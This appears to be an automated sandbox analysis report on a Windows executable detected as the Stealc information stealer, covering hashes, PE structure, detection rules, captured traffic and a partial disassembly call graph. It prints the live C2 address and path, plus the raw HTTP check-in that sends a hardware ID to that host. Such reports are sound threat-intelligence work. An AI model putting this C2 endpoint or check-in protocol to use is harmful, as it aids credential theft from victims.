                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 82
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.945294044164301
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'852'928 bytes
                            MD5:3c4a472bba3dee50286e154336b9643e
                            SHA1:8aeb79c1357013ae448e4365786b3352d5436b11
                            SHA256:8bc63380429f0d4476b62f4e52eca341094f21d326f82535d61a5a5035840a89
                            SHA512:7e2f9947e0172e063983f6bd567be598f4aee91885f2a34b26ad7e4dd5578dcead00951ce8ea8edd6b90b6deb7c9a73662c485d9f700c355ca86f6065ceedb25
                            SSDEEP:49152:97I11HeczEVCS/LBjkb5V1lvQX74JYYEdsRmSD1:97I11VzEw2LB4FVXYL4JqswU
                            TLSH:2385333DE9221D65EA67DB70DCA1DE3C95B4117DCA248B2F5A79C31A341A220F1213FA
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xa9e000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FB438C3B30Ah

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x2280006c0b67e561758e2897a0e4744596f60unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2a00000x200cec0ecbd21db2491ccd5696e8dd4aff9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            wdprdbdb0x4fe0000x19f0000x19e4000183850ce463f1e19e56df419b6a15c8False0.9946403986873869data7.95311750631902IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            rwcfgkti0x69d0000x10000x400cff930119e13f4463c816d5b274ca356False0.7861328125data6.1114591601782315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x69e0000x30000x2200cc3b851385ec88255a882a40fb07ecd5False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-10T20:25:12.186591+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 10, 2024 20:25:10.589113951 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 20:25:11.205245018 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 20:25:11.205580950 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 20:25:11.205940008 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 20:25:11.211221933 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 20:25:11.945841074 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 20:25:11.945943117 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 20:25:11.948759079 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 20:25:11.953767061 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 20:25:12.186496019 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 20:25:12.186590910 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 20:25:14.688338995 CEST4973080192.168.2.4185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730185.215.113.37807284C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 20:25:11.205940008 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 10, 2024 20:25:11.945841074 CEST203INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 18:25:11 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 10, 2024 20:25:11.948759079 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC
                            Host: 185.215.113.37
                            Content-Length: 210
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 43 46 32 42 45 36 44 46 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a
                            Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="hwid"24CF2BE6DF91922063497------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build"doma------CFHDBFIEGIDGIECBKJEC--
                            Oct 10, 2024 20:25:12.186496019 CEST210INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 18:25:12 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:14:25:07
                            Start date:10/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x120000
                            File size:1'852'928 bytes
                            MD5 hash:3C4A472BBA3DEE50286E154336B9643E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:7.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph 13372 1369f0 13417 122260 13372->13417 13396 136a64 13397 13a9b0 4 API calls 13396->13397 13398 136a6b 13397->13398 13399 13a9b0 4 API calls 13398->13399 13400 136a72 13399->13400 13401 13a9b0 4 API calls 13400->13401 13402 136a79 13401->13402 13403 13a9b0 4 API calls 13402->13403 13404 136a80 13403->13404 13569 13a8a0 13404->13569 13406 136b0c 13573 136920 GetSystemTime 13406->13573 13408 136a89 13408->13406 13409 136ac2 OpenEventA 13408->13409 13411 136af5 CloseHandle Sleep 13409->13411 13412 136ad9 13409->13412 13414 136b0a 13411->13414 13416 136ae1 CreateEventA 13412->13416 13414->13408 13416->13406 13770 1245c0 13417->13770 13419 122274 13420 1245c0 2 API calls 13419->13420 13421 12228d 13420->13421 13422 1245c0 2 API calls 13421->13422 13423 1222a6 13422->13423 13424 1245c0 2 API calls 13423->13424 13425 1222bf 13424->13425 13426 1245c0 2 API calls 13425->13426 13427 1222d8 13426->13427 13428 1245c0 2 API calls 13427->13428 13429 1222f1 13428->13429 13430 1245c0 2 API calls 13429->13430 13431 12230a 13430->13431 13432 1245c0 2 API calls 13431->13432 13433 122323 13432->13433 13434 1245c0 2 API calls 13433->13434 13435 12233c 13434->13435 13436 1245c0 2 API calls 13435->13436 13437 122355 13436->13437 13438 1245c0 2 API calls 13437->13438 13439 12236e 13438->13439 13440 1245c0 2 API calls 13439->13440 13441 122387 13440->13441 13442 1245c0 2 API calls 13441->13442 13443 1223a0 13442->13443 13444 1245c0 2 API calls 13443->13444 13445 1223b9 13444->13445 13446 1245c0 2 API calls 13445->13446 13447 1223d2 13446->13447 13448 1245c0 2 API calls 13447->13448 13449 1223eb 13448->13449 13450 1245c0 2 API calls 13449->13450 13451 122404 13450->13451 13452 1245c0 2 API calls 13451->13452 13453 12241d 13452->13453 13454 1245c0 2 API calls 13453->13454 13455 122436 13454->13455 13456 1245c0 2 API calls 13455->13456 13457 12244f 13456->13457 13458 1245c0 2 API calls 13457->13458 13459 122468 13458->13459 13460 1245c0 2 API calls 13459->13460 13461 122481 13460->13461 13462 1245c0 2 API calls 13461->13462 13463 12249a 13462->13463 13464 1245c0 2 API calls 13463->13464 13465 1224b3 13464->13465 13466 1245c0 2 API calls 13465->13466 13467 1224cc 13466->13467 13468 1245c0 2 API calls 13467->13468 13469 1224e5 13468->13469 13470 1245c0 2 API calls 13469->13470 13471 1224fe 13470->13471 13472 1245c0 2 API calls 13471->13472 13473 122517 13472->13473 13474 1245c0 2 API calls 13473->13474 13475 122530 13474->13475 13476 1245c0 2 API calls 13475->13476 13477 122549 13476->13477 13478 1245c0 2 API calls 13477->13478 13479 122562 13478->13479 13480 1245c0 2 API calls 13479->13480 13481 12257b 13480->13481 13482 1245c0 2 API calls 13481->13482 13483 122594 13482->13483 13484 1245c0 2 API calls 13483->13484 13485 1225ad 13484->13485 13486 1245c0 2 API calls 13485->13486 13487 1225c6 13486->13487 13488 1245c0 2 API calls 13487->13488 13489 1225df 13488->13489 13490 1245c0 2 API calls 13489->13490 13491 1225f8 13490->13491 13492 1245c0 2 API calls 13491->13492 13493 122611 13492->13493 13494 1245c0 2 API calls 13493->13494 13495 12262a 13494->13495 13496 1245c0 2 API calls 13495->13496 13497 122643 13496->13497 13498 1245c0 2 API calls 13497->13498 13499 12265c 13498->13499 13500 1245c0 2 API calls 13499->13500 13501 122675 13500->13501 13502 1245c0 2 API calls 13501->13502 13503 12268e 13502->13503 13504 139860 13503->13504 13775 139750 GetPEB 13504->13775 13506 139868 13507 139a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13506->13507 13508 13987a 13506->13508 13509 139af4 GetProcAddress 13507->13509 13510 139b0d 13507->13510 13511 13988c 21 API calls 13508->13511 13509->13510 13512 139b46 13510->13512 13513 139b16 GetProcAddress GetProcAddress 13510->13513 13511->13507 13514 139b68 13512->13514 13515 139b4f GetProcAddress 13512->13515 13513->13512 13516 139b71 GetProcAddress 13514->13516 13517 139b89 13514->13517 13515->13514 13516->13517 13518 139b92 GetProcAddress GetProcAddress 13517->13518 13519 136a00 13517->13519 13518->13519 13520 13a740 13519->13520 13521 13a750 13520->13521 13522 136a0d 13521->13522 13523 13a77e lstrcpy 13521->13523 13524 1211d0 13522->13524 13523->13522 13525 1211e8 13524->13525 13526 121217 13525->13526 13527 12120f ExitProcess 13525->13527 13528 121160 GetSystemInfo 13526->13528 13529 121184 13528->13529 13530 12117c ExitProcess 13528->13530 13531 121110 GetCurrentProcess VirtualAllocExNuma 13529->13531 13532 121141 ExitProcess 13531->13532 13533 121149 13531->13533 13776 1210a0 VirtualAlloc 13533->13776 13536 121220 13780 1389b0 13536->13780 13539 121249 __aulldiv 13540 12129a 13539->13540 13541 121292 ExitProcess 13539->13541 13542 136770 GetUserDefaultLangID 13540->13542 13543 1367d3 13542->13543 13544 136792 13542->13544 13550 121190 13543->13550 13544->13543 13545 1367a3 ExitProcess 13544->13545 13546 1367c1 ExitProcess 13544->13546 13547 1367b7 ExitProcess 13544->13547 13548 1367cb ExitProcess 13544->13548 13549 1367ad ExitProcess 13544->13549 13551 1378e0 3 API calls 13550->13551 13552 12119e 13551->13552 13553 1211cc 13552->13553 13554 137850 3 API calls 13552->13554 13557 137850 GetProcessHeap RtlAllocateHeap GetUserNameA 13553->13557 13555 1211b7 13554->13555 13555->13553 13556 1211c4 ExitProcess 13555->13556 13558 136a30 13557->13558 13559 1378e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13558->13559 13560 136a43 13559->13560 13561 13a9b0 13560->13561 13782 13a710 13561->13782 13563 13a9c1 lstrlen 13565 13a9e0 13563->13565 13564 13aa18 13783 13a7a0 13564->13783 13565->13564 13567 13a9fa lstrcpy lstrcat 13565->13567 13567->13564 13568 13aa24 13568->13396 13570 13a8bb 13569->13570 13571 13a90b 13570->13571 13572 13a8f9 lstrcpy 13570->13572 13571->13408 13572->13571 13787 136820 13573->13787 13575 13698e 13576 136998 sscanf 13575->13576 13816 13a800 13576->13816 13578 1369aa SystemTimeToFileTime SystemTimeToFileTime 13579 1369e0 13578->13579 13580 1369ce 13578->13580 13582 135b10 13579->13582 13580->13579 13581 1369d8 ExitProcess 13580->13581 13583 135b1d 13582->13583 13584 13a740 lstrcpy 13583->13584 13585 135b2e 13584->13585 13818 13a820 lstrlen 13585->13818 13588 13a820 2 API calls 13589 135b64 13588->13589 13590 13a820 2 API calls 13589->13590 13591 135b74 13590->13591 13822 136430 13591->13822 13594 13a820 2 API calls 13595 135b93 13594->13595 13596 13a820 2 API calls 13595->13596 13597 135ba0 13596->13597 13598 13a820 2 API calls 13597->13598 13599 135bad 13598->13599 13600 13a820 2 API calls 13599->13600 13601 135bf9 13600->13601 13831 1226a0 13601->13831 13609 135cc3 13610 136430 lstrcpy 13609->13610 13611 135cd5 13610->13611 13612 13a7a0 lstrcpy 13611->13612 13613 135cf2 13612->13613 13614 13a9b0 4 API calls 13613->13614 13615 135d0a 13614->13615 13616 13a8a0 lstrcpy 13615->13616 13617 135d16 13616->13617 13618 13a9b0 4 API calls 13617->13618 13619 135d3a 13618->13619 13620 13a8a0 lstrcpy 13619->13620 13621 135d46 13620->13621 13622 13a9b0 4 API calls 13621->13622 13623 135d6a 13622->13623 13624 13a8a0 lstrcpy 13623->13624 13625 135d76 13624->13625 13626 13a740 lstrcpy 13625->13626 13627 135d9e 13626->13627 14557 137500 GetWindowsDirectoryA 13627->14557 13630 13a7a0 lstrcpy 13631 135db8 13630->13631 14567 124880 13631->14567 13633 135dbe 14712 1317a0 13633->14712 13635 135dc6 13636 13a740 lstrcpy 13635->13636 13637 135de9 13636->13637 13638 121590 lstrcpy 13637->13638 13639 135dfd 13638->13639 14728 125960 13639->14728 13641 135e03 14872 131050 13641->14872 13643 135e0e 13644 13a740 lstrcpy 13643->13644 13645 135e32 13644->13645 13646 121590 lstrcpy 13645->13646 13647 135e46 13646->13647 13648 125960 34 API calls 13647->13648 13649 135e4c 13648->13649 14876 130d90 13649->14876 13651 135e57 13652 13a740 lstrcpy 13651->13652 13653 135e79 13652->13653 13654 121590 lstrcpy 13653->13654 13655 135e8d 13654->13655 13656 125960 34 API calls 13655->13656 13657 135e93 13656->13657 14883 130f40 13657->14883 13659 135e9e 13660 121590 lstrcpy 13659->13660 13661 135eb5 13660->13661 14888 131a10 13661->14888 13663 135eba 13664 13a740 lstrcpy 13663->13664 13665 135ed6 13664->13665 15232 124fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13665->15232 13667 135edb 13668 121590 lstrcpy 13667->13668 13669 135f5b 13668->13669 15239 130740 13669->15239 13671 135f60 13672 13a740 lstrcpy 13671->13672 13673 135f86 13672->13673 13674 121590 lstrcpy 13673->13674 13675 135f9a 13674->13675 13676 125960 34 API calls 13675->13676 13677 135fa0 13676->13677 13771 1245d1 RtlAllocateHeap 13770->13771 13773 124621 VirtualProtect 13771->13773 13773->13419 13775->13506 13777 1210c2 ctype 13776->13777 13778 1210fd 13777->13778 13779 1210e2 VirtualFree 13777->13779 13778->13536 13779->13778 13781 121233 GlobalMemoryStatusEx 13780->13781 13781->13539 13782->13563 13784 13a7c2 13783->13784 13785 13a7ec 13784->13785 13786 13a7da lstrcpy 13784->13786 13785->13568 13786->13785 13788 13a740 lstrcpy 13787->13788 13789 136833 13788->13789 13790 13a9b0 4 API calls 13789->13790 13791 136845 13790->13791 13792 13a8a0 lstrcpy 13791->13792 13793 13684e 13792->13793 13794 13a9b0 4 API calls 13793->13794 13795 136867 13794->13795 13796 13a8a0 lstrcpy 13795->13796 13797 136870 13796->13797 13798 13a9b0 4 API calls 13797->13798 13799 13688a 13798->13799 13800 13a8a0 lstrcpy 13799->13800 13801 136893 13800->13801 13802 13a9b0 4 API calls 13801->13802 13803 1368ac 13802->13803 13804 13a8a0 lstrcpy 13803->13804 13805 1368b5 13804->13805 13806 13a9b0 4 API calls 13805->13806 13807 1368cf 13806->13807 13808 13a8a0 lstrcpy 13807->13808 13809 1368d8 13808->13809 13810 13a9b0 4 API calls 13809->13810 13811 1368f3 13810->13811 13812 13a8a0 lstrcpy 13811->13812 13813 1368fc 13812->13813 13814 13a7a0 lstrcpy 13813->13814 13815 136910 13814->13815 13815->13575 13817 13a812 13816->13817 13817->13578 13819 13a83f 13818->13819 13820 135b54 13819->13820 13821 13a87b lstrcpy 13819->13821 13820->13588 13821->13820 13823 13a8a0 lstrcpy 13822->13823 13824 136443 13823->13824 13825 13a8a0 lstrcpy 13824->13825 13826 136455 13825->13826 13827 13a8a0 lstrcpy 13826->13827 13828 136467 13827->13828 13829 13a8a0 lstrcpy 13828->13829 13830 135b86 13829->13830 13830->13594 13832 1245c0 2 API calls 13831->13832 13833 1226b4 13832->13833 13834 1245c0 2 API calls 13833->13834 13835 1226d7 13834->13835 13836 1245c0 2 API calls 13835->13836 13837 1226f0 13836->13837 13838 1245c0 2 API calls 13837->13838 13839 122709 13838->13839 13840 1245c0 2 API calls 13839->13840 13841 122736 13840->13841 13842 1245c0 2 API calls 13841->13842 13843 12274f 13842->13843 13844 1245c0 2 API calls 13843->13844 13845 122768 13844->13845 13846 1245c0 2 API calls 13845->13846 13847 122795 13846->13847 13848 1245c0 2 API calls 13847->13848 13849 1227ae 13848->13849 13850 1245c0 2 API calls 13849->13850 13851 1227c7 13850->13851 13852 1245c0 2 API calls 13851->13852 13853 1227e0 13852->13853 13854 1245c0 2 API calls 13853->13854 13855 1227f9 13854->13855 13856 1245c0 2 API calls 13855->13856 13857 122812 13856->13857 13858 1245c0 2 API calls 13857->13858 13859 12282b 13858->13859 13860 1245c0 2 API calls 13859->13860 13861 122844 13860->13861 13862 1245c0 2 API calls 13861->13862 13863 12285d 13862->13863 13864 1245c0 2 API calls 13863->13864 13865 122876 13864->13865 13866 1245c0 2 API calls 13865->13866 13867 12288f 13866->13867 13868 1245c0 2 API calls 13867->13868 13869 1228a8 13868->13869 13870 1245c0 2 API calls 13869->13870 13871 1228c1 13870->13871 13872 1245c0 2 API calls 13871->13872 13873 1228da 13872->13873 13874 1245c0 2 API calls 13873->13874 13875 1228f3 13874->13875 13876 1245c0 2 API calls 13875->13876 13877 12290c 13876->13877 13878 1245c0 2 API calls 13877->13878 13879 122925 13878->13879 13880 1245c0 2 API calls 13879->13880 13881 12293e 13880->13881 13882 1245c0 2 API calls 13881->13882 13883 122957 13882->13883 13884 1245c0 2 API calls 13883->13884 13885 122970 13884->13885 13886 1245c0 2 API calls 13885->13886 13887 122989 13886->13887 13888 1245c0 2 API calls 13887->13888 13889 1229a2 13888->13889 13890 1245c0 2 API calls 13889->13890 13891 1229bb 13890->13891 13892 1245c0 2 API calls 13891->13892 13893 1229d4 13892->13893 13894 1245c0 2 API calls 13893->13894 13895 1229ed 13894->13895 13896 1245c0 2 API calls 13895->13896 13897 122a06 13896->13897 13898 1245c0 2 API calls 13897->13898 13899 122a1f 13898->13899 13900 1245c0 2 API calls 13899->13900 13901 122a38 13900->13901 13902 1245c0 2 API calls 13901->13902 13903 122a51 13902->13903 13904 1245c0 2 API calls 13903->13904 13905 122a6a 13904->13905 13906 1245c0 2 API calls 13905->13906 13907 122a83 13906->13907 13908 1245c0 2 API calls 13907->13908 13909 122a9c 13908->13909 13910 1245c0 2 API calls 13909->13910 13911 122ab5 13910->13911 13912 1245c0 2 API calls 13911->13912 13913 122ace 13912->13913 13914 1245c0 2 API calls 13913->13914 13915 122ae7 13914->13915 13916 1245c0 2 API calls 13915->13916 13917 122b00 13916->13917 13918 1245c0 2 API calls 13917->13918 13919 122b19 13918->13919 13920 1245c0 2 API calls 13919->13920 13921 122b32 13920->13921 13922 1245c0 2 API calls 13921->13922 13923 122b4b 13922->13923 13924 1245c0 2 API calls 13923->13924 13925 122b64 13924->13925 13926 1245c0 2 API calls 13925->13926 13927 122b7d 13926->13927 13928 1245c0 2 API calls 13927->13928 13929 122b96 13928->13929 13930 1245c0 2 API calls 13929->13930 13931 122baf 13930->13931 13932 1245c0 2 API calls 13931->13932 13933 122bc8 13932->13933 13934 1245c0 2 API calls 13933->13934 13935 122be1 13934->13935 13936 1245c0 2 API calls 13935->13936 13937 122bfa 13936->13937 13938 1245c0 2 API calls 13937->13938 13939 122c13 13938->13939 13940 1245c0 2 API calls 13939->13940 13941 122c2c 13940->13941 13942 1245c0 2 API calls 13941->13942 13943 122c45 13942->13943 13944 1245c0 2 API calls 13943->13944 13945 122c5e 13944->13945 13946 1245c0 2 API calls 13945->13946 13947 122c77 13946->13947 13948 1245c0 2 API calls 13947->13948 13949 122c90 13948->13949 13950 1245c0 2 API calls 13949->13950 13951 122ca9 13950->13951 13952 1245c0 2 API calls 13951->13952 13953 122cc2 13952->13953 13954 1245c0 2 API calls 13953->13954 13955 122cdb 13954->13955 13956 1245c0 2 API calls 13955->13956 13957 122cf4 13956->13957 13958 1245c0 2 API calls 13957->13958 13959 122d0d 13958->13959 13960 1245c0 2 API calls 13959->13960 13961 122d26 13960->13961 13962 1245c0 2 API calls 13961->13962 13963 122d3f 13962->13963 13964 1245c0 2 API calls 13963->13964 13965 122d58 13964->13965 13966 1245c0 2 API calls 13965->13966 13967 122d71 13966->13967 13968 1245c0 2 API calls 13967->13968 13969 122d8a 13968->13969 13970 1245c0 2 API calls 13969->13970 13971 122da3 13970->13971 13972 1245c0 2 API calls 13971->13972 13973 122dbc 13972->13973 13974 1245c0 2 API calls 13973->13974 13975 122dd5 13974->13975 13976 1245c0 2 API calls 13975->13976 13977 122dee 13976->13977 13978 1245c0 2 API calls 13977->13978 13979 122e07 13978->13979 13980 1245c0 2 API calls 13979->13980 13981 122e20 13980->13981 13982 1245c0 2 API calls 13981->13982 13983 122e39 13982->13983 13984 1245c0 2 API calls 13983->13984 13985 122e52 13984->13985 13986 1245c0 2 API calls 13985->13986 13987 122e6b 13986->13987 13988 1245c0 2 API calls 13987->13988 13989 122e84 13988->13989 13990 1245c0 2 API calls 13989->13990 13991 122e9d 13990->13991 13992 1245c0 2 API calls 13991->13992 13993 122eb6 13992->13993 13994 1245c0 2 API calls 13993->13994 13995 122ecf 13994->13995 13996 1245c0 2 API calls 13995->13996 13997 122ee8 13996->13997 13998 1245c0 2 API calls 13997->13998 13999 122f01 13998->13999 14000 1245c0 2 API calls 13999->14000 14001 122f1a 14000->14001 14002 1245c0 2 API calls 14001->14002 14003 122f33 14002->14003 14004 1245c0 2 API calls 